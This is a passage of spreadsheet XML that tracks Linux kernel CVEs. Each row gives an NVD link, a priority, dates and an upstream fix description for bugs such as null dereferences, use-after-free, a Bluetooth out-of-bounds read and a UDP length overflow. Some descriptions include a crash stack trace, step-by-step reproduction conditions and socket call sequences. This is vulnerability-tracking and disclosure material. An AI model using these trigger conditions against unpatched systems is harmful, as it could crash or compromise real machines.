          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: null-check fib6_node before accessing in __ip6_del_rt_siblings()
syzbot reported a null-ptr-deref in __ip6_del_rt_siblings() [0].
The stack trace hinted towards a null dereference of rt-&gt;fib6_node when
fn-&gt;leaf is accessed in __ip6_del_rt_siblings(). With
RTNL_FLAG_DOIT_UNLOCKED set, inet6_rtm_delroute() operations run
concurrently without acquiring the RTNL lock. In ip6_route_del(), the
route lookup happens under rcu_read_lock() without acquiring
table-&gt;tb6_lock.
Between ip6_route_del() looking up the route and __ip6_del_rt_siblings()
acquiring table-&gt;tb6_lock, another thread can modify the routing table.
For example, when an ECMP route is replaced via RTM_NEWROUTE with
NLM_F_REPLACE, fib6_add_rt2node() unlinks all old siblings and sets
iter-&gt;fib6_node = NULL. A reproducer was found that triggers this [1].
Add a check to ensure rt-&gt;fib6_node is non-null before accessing it.
[0]
KASAN: null-ptr-deref in range [0x0000000000000020-0x0000000000000027]
RIP: 0010:__ip6_del_rt_siblings+0x31e/0x7c0 net/ipv6/route.c:4056
Call Trace:
 &lt;TASK&gt;
 ip6_route_del+0x1054/0x1110 net/ipv6/route.c:4232
 inet6_rtm_delroute+0x5d7/0x6d0 net/ipv6/route.c:5669
 rtnetlink_rcv_msg+0x802/0xc00 net/core/rtnetlink.c:7132
 netlink_rcv_skb+0x226/0x4a0 net/netlink/af_netlink.c:2556
 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
 netlink_unicast+0x7f5/0x990 net/netlink/af_netlink.c:1345
 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1900
 sock_sendmsg_nosec+0x13a/0x180 net/socket.c:800
 __sock_sendmsg net/socket.c:815 [inline]
 ____sys_sendmsg+0x565/0x870 net/socket.c:2713
 ___sys_sendmsg+0x2a5/0x360 net/socket.c:2767
 __sys_sendmsg net/socket.c:2799 [inline]
 __do_sys_sendmsg net/socket.c:2804 [inline]
 __se_sys_sendmsg net/socket.c:2802 [inline]
 __x64_sys_sendmsg+0x1b7/0x290 net/socket.c:2802
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x166/0x520 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
 &lt;/TASK&gt;
[1] https://gist.github.com/NamanGulati/0766a1159b6ca61928faaf87425ff899</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97974</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97975</t>
        </is>
      </c>
      <c r="D615" s="5" t="inlineStr"/>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="inlineStr"/>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr"/>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_sysfs: Fix NULL pointer dereference in device_del()
A NULL pointer dereference in klist_put() occurs when a child device (such
as a BNEP network device in bnep_session) is concurrently being
unregistered while hci_conn_del_sysfs() reparents child devices.
This is caused by a race condition between hci_conn_del_sysfs() and
concurrent child device unregistration (e.g. bnep_session calling
unregister_netdev()). During device unregistration, device_del() snapshots
a non-NULL parent pointer. Concurrently, hci_conn_del_sysfs() finds the
child device using device_find_any_child() and calls device_move() to
reparent it to NULL, which removes the node from its parent's klist and
clears knode_parent. Subsequently, device_del() calls
klist_del(&amp;dev-&gt;p-&gt;knode_parent) using the stale parent snapshot, causing
klist_put() to dereference knode_klist(n)-&gt;put on an already removed node,
resulting in a NULL pointer dereference.
This race was introduced by commit 27aabf27fd01 ("Bluetooth: fix
use-after-free in device_for_each_child()"), which replaced
device_find_child(..., __match_tty) with device_find_any_child() in
hci_conn_del_sysfs(). That change was intended to avoid a use-after-free
where conn-&gt;dev outlived its parent hdev-&gt;dev when child devices held
references to conn-&gt;dev, because conn-&gt;dev only held a reference to
hdev-&gt;dev while registered in sysfs.
Fix the issue properly by taking an explicit reference to the parent device
with get_device(&amp;hdev-&gt;dev) in hci_conn_init_sysfs() and dropping it with
put_device(parent) in bt_link_release() when the conn device is freed. This
ensures that hdev-&gt;dev remains valid for the entire lifecycle of conn-&gt;dev,
resolving the underlying use-after-free. With the parent reference held
properly, restore the __match_tty filter in hci_conn_del_sysfs() so that
device_move() is only invoked on persistent RFCOMM TTY devices as
originally intended, eliminating the race condition with unregistering
network devices.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97975</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97976</t>
        </is>
      </c>
      <c r="D616" s="5" t="inlineStr"/>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="inlineStr"/>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr"/>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel_pcie: validate packet_len before skb_put_data
btintel_pcie_submit_rx_work() reads packet_len from rfh_hdr without
checking if it exceeds the RX buffer size. An oversized packet_len
can lead to an out-of-bounds read in skb_put_data().
Validate packet_len to ensure it is non-zero and does not exceed
BTINTEL_PCIE_BUFFER_SIZE - sizeof(*rfh_hdr), logging an error when
invalid.
This issue was reported by Claude Mythos. It can be simulated either by
using customized firmware configured to return an invalid packet_len or
by modifying rfh_hdr-&gt;packet_len in the driver before calling
btintel_pcie_submit_rx_work().</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97976</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97977</t>
        </is>
      </c>
      <c r="D617" s="5" t="inlineStr"/>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="inlineStr"/>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr"/>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btusb: Fix UAF of btusb_data by rx_work
btusb_close() and btusb_flush() cancel data-&gt;rx_work with the
asynchronous cancel_delayed_work(), so if btusb_rx_work() is already
running on another CPU it keeps running after the cancel returns.
btusb_disconnect() calls hci_unregister_dev(), which invokes
btusb_close(), and then frees the btusb_data. A still running
btusb_rx_work() then dereferences the freed data:
	while ((skb = skb_dequeue(&amp;data-&gt;acl_q)))
		data-&gt;recv_acl(data-&gt;hdev, skb);
Use cancel_delayed_work_sync() instead. In btusb_close() the cancel also
has to happen after btusb_stop_traffic(), otherwise an URB completion
racing with the cancel can requeue the work right after it has been
waited for.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97977</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97978</t>
        </is>
      </c>
      <c r="D618" s="5" t="inlineStr"/>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr"/>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: ice: don't dereference pointers from TP_printk()
After forwarding net-next during the v7.3 merge window we started
seeing:
  TRACE EVENT ERROR: Event ice_tx_dim_work has double dereference in TP_printk: REC-&gt;q_vector-&gt;tx.tx_ring-&gt;q_index
  WARNING: kernel/trace/trace_events.c:420 at test_double_dereference.cold+0x39/0x4b
this is due to extra checks added in tracing subsystem in
commit b5cc230af5e5 ("tracing: Warn when an event dereferences a pointer in TP_printk()").
Printing happens long after the event was recorded, by which point
the pointers may be invalid (the ring or the dim instance).
Copy the eight scalars into the event instead.</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97978</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97979</t>
        </is>
      </c>
      <c r="D619" s="5" t="inlineStr"/>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="inlineStr"/>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr"/>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ice: add missing xa_destroy for sched_node_ids
Commit 16dfa49406bc ("ice: Introduce new parameters in ice_sched_node")
added a sched_node_ids xarray to the port info structure, but never called
xa_destroy on it.
Since xarrays can allocate internal memory, this can result in a memory
leak even if every element in the xarray has been removed.
The xarray is currently embedded in the port_info structure. This appears
to have been done because its use is within functions that take the
port_info as a primary argument.
However, this complicates managing the lifecycle of the field. The
port_info structure is allocated in ice_init_hw() using devm, and it is
not released until the devm cleanup when the driver is unloaded.
The ice_init_hw() function is called in many places, including devlink
reload, and possibly during DDP load after updating the Tx scheduler
layout.
Adding a call of xa_destroy to the ice_deinit_hw() causes Sashiko to raise
multiple concerns due to potential ordering issues and possible ways that
port_info could be a dangling reference.
To handle this, move the sched_node_ids out of port_info and into the hw
structure. All users of the array already have a pointer to hw anyways, and
there is only one sched_node_ids per adapter. While here, remove the overly
verbose comment explaining the nature of the sched_node_ids xarray.
Add the missing xa_destroy to the cleanup path and to ice_deinit_hw(),
ensuring that we properly release the xarray memory.
This was caught by Sashiko during development of unrelated code.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97979</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97980</t>
        </is>
      </c>
      <c r="D620" s="5" t="inlineStr"/>
      <c r="E620" s="5" t="inlineStr"/>
      <c r="F620" s="5" t="inlineStr"/>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="inlineStr"/>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr"/>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr"/>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/debug: Fix NULL pointer dereference in debug_set_level()
Commit a2cec6863709 ("s390/debug: Add s390dbf kernel parameter")
incorrectly removed a null-id check from debug_set_level(), introducing
a possible NULL pointer dereference for debug-API users that put
debug_register() results unchecked into debug_set_level().
Fix this by moving the check from the internal _debug_set_level()
variant back to the external debug_set_level() wrapper.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97980</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97981</t>
        </is>
      </c>
      <c r="D621" s="5" t="inlineStr"/>
      <c r="E621" s="5" t="inlineStr"/>
      <c r="F621" s="5" t="inlineStr"/>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="inlineStr"/>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr"/>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr"/>
      <c r="S621" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: cortina: Count dropped frames as NAPI work
The RX loop only consumes budget when it successfully delivers a frame.
Error paths keep consuming descriptors without reducing the budget, so a
stream of bad frames can process the entire receive ring in one poll.
Move the budget accounting to a common end-of-frame path. This counts
each completed frame as NAPI work whether it was delivered or dropped,
matching the behavior of the vendor driver.</t>
        </is>
      </c>
      <c r="T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97981</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97982</t>
        </is>
      </c>
      <c r="D622" s="5" t="inlineStr"/>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="inlineStr"/>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr"/>
      <c r="S622" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: cortina: Fix budget accounting
The gmac_rx() function returns the remaining NAPI budget, but its
caller treats the return value as the number of packets received. An
idle poll therefore reports a full budget and remains scheduled.
Return the number of received packets instead. Preserve the existing
free queue refill accounting by adding that count directly; continuing
to subtract it from the budget would invert the refill behavior.</t>
        </is>
      </c>
      <c r="T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97982</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97983</t>
        </is>
      </c>
      <c r="D623" s="5" t="inlineStr"/>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="inlineStr"/>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr"/>
      <c r="S623" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vduse: return compat ioctl results directly
The compat handler handles VDUSE_IOTLB_GET_FD and VDUSE_VQ_GET_INFO, but
then calls the native handler. Their different command sizes make native
dispatch return -ENOIOCTLCMD.
For GET_FD, this overwrites receive_fd()'s return value after the
descriptor is installed, leaking one fd per call. Return handled compat
results directly and use native dispatch only for other commands.</t>
        </is>
      </c>
      <c r="T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97983</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97984</t>
        </is>
      </c>
      <c r="D624" s="5" t="inlineStr"/>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="inlineStr"/>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr"/>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ipv6: Fix UDP length overflow with PMTU discover and big MTU
This commit bounds cork-&gt;base.fragsize to IP6_MAX_MTU for UDP sockets to
avoid a possible overflow of UDP length that triggers a WARN in
udp_set_len_short when setsockopt IPV6_MTU_DISCOVER is set to
IPV6_PMTUDISC_DO or IPV6_PMTUDISC_PROBE, and a large packet is sent over
a netdev with an unusually large MTU.
Steps to reproduce (included in the new selftest):
1. Set device MTU bigger than IP6_MAX_MTU. cork-&gt;base.fragsize will be
   set to that MTU in ip6_setup_cork.
2. Set IPV6_MTU_DISCOVER to IPV6_PMTUDISC_PROBE or IPV6_PMTUDISC_DO. It
   lets maxnonfragsize be set to device MTU (cork-&gt;fragsize) in
   __ip6_append_data, rather than to IP6_MAX_MTU.
3. Send 65528 bytes of payload (+8 bytes of UDP header, +40 bytes of
   IPv6 header). Device MTU allows it (it's only one byte bigger than
   IP6_MAX_MTU, and the device MTU is bigger than that).
4. The UDP length in the built packet is 65536, which overflows the
   16-bit length field and triggers the WARN in udp_set_len_short.
To avoid breaking sending UDP jumbograms over raw IPv6 sockets, limit
the change to UDP sockets only.
The original overflow bug with IPv6 and IPV6_PMTUDISC_DO seems to
predate git history (verified reproduction on 2.6.21), was fixed later,
and then reappeared in commit 427faee167bc ("net: ipv6: introduce
ip6_dst_mtu_maybe_forward"), which is chosen as the Fixes tag here. The
overflow with IPV6_PMTUDISC_PROBE reproduces since its introduction in
commit 628a5c561890 ("[INET]: Add IP(V6)_PMTUDISC_RPOBE").</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97984</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97985</t>
        </is>
      </c>
      <c r="D625" s="5" t="inlineStr"/>
      <c r="E625" s="5" t="inlineStr"/>
      <c r="F625" s="5" t="inlineStr"/>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="inlineStr"/>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr"/>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr"/>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
af_unix: Update last skb marker in manage_oob().
Fahad Alharbi reported that blocking recv(MSG_PEEK) could hog CPU
due to OOB skb.
In the following cases, manage_oob() skips OOB skb(s) and returns
NULL for the last recv(MSG_PEEK):
  socketpair(AF_UNIX, SOCK_STREAM, 0, sk);
  1) skb -&gt; OOB skb -&gt; NULL
     send(sk[0], "ab", 2, MSG_OOB);
     recv(sk[1], buf, 0, MSG_PEEK);
  2) skb -&gt; consumed OOB skb -&gt; NULL
     send(sk[0], "ab", 2, MSG_OOB);
     recv(sk[1], buf, 1, MSG_OOB);
     recv(sk[1], buf, 0, MSG_PEEK);
  3) consumed OOB skb -&gt; OOB skb -&gt; NULL
     send(sk[0], "a", 1, MSG_OOB);
     recv(sk[1], buf, 0, MSG_OOB);
     send(sk[0], "b", 1, MSG_OOB);
     recv(sk[1], buf, 1, MSG_PEEK);
Then, @copied is 0 in unix_stream_read_generic() (zero-length buffer,
or non-OOB skb is not yet consumed), and unix_stream_data_wait() is
called.
However, it returns immediately because @last is not updated in
unix_stream_read_generic(), and the thread busy-waits for a new skb.
Let's update @last in manage_oob().
For MSG_PEEK, @last is updated with the skipped OOB, and for the
non-peek case, @last matches the returned value (when !copied)
because OOB is unlinked.
Note that manage_oob() is inlined and no stack canary is added.</t>
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97985</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97986</t>
        </is>
      </c>
      <c r="D626" s="5" t="inlineStr"/>
      <c r="E626" s="5" t="inlineStr"/>
      <c r="F626" s="5" t="inlineStr"/>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="inlineStr"/>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr"/>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr"/>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_input: stop callbacks before unregistering input device
virtinput_remove() unregisters the input device before resetting the
virtio device. virtinput_recv_events() drops vi-&gt;lock around input_event(),
so clearing vi-&gt;ready does not stop a callback that passed the entry check.
It can still use vi-&gt;idev, requeue buffers and kick the queue.
Reset first, as virtinput_freeze() already does. With the preceding core
change, reset waits for callbacks before input_unregister_device() can
free vi-&gt;idev. Recheck vi-&gt;ready after taking the lock again: keep draining
completed events so an input packet is not truncated, but stop requeueing
buffers and kicking the queue.
With evdev attached, input_unregister_handle() currently waits for an RCU
grace period, which also waits out IRQ callbacks. This masks the lifetime
bug on PCI and MMIO, but does not protect sleepable callbacks on other
transports.</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97986</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97987</t>
        </is>
      </c>
      <c r="D627" s="5" t="inlineStr"/>
      <c r="E627" s="5" t="inlineStr"/>
      <c r="F627" s="5" t="inlineStr"/>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="inlineStr"/>
      <c r="I627" s="5" t="inlineStr"/>
